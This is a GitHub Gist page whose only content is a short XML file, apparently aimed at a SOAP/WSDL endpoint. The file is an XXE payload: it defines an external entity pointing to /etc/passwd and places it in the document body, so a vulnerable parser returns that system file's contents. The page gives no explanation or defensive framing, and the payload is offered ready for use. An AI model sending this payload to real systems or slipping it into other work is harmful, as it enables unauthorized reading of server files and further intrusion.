Created
August 2, 2024 20:48
-
-
Save 000pp/e7d7bd6705366ef181e54f72bdbe9f79 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd"> | |
]> | |
<definitions targetNamespace="http://example.org"> | |
<foo>&xxe;</foo> | |
</definitions> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment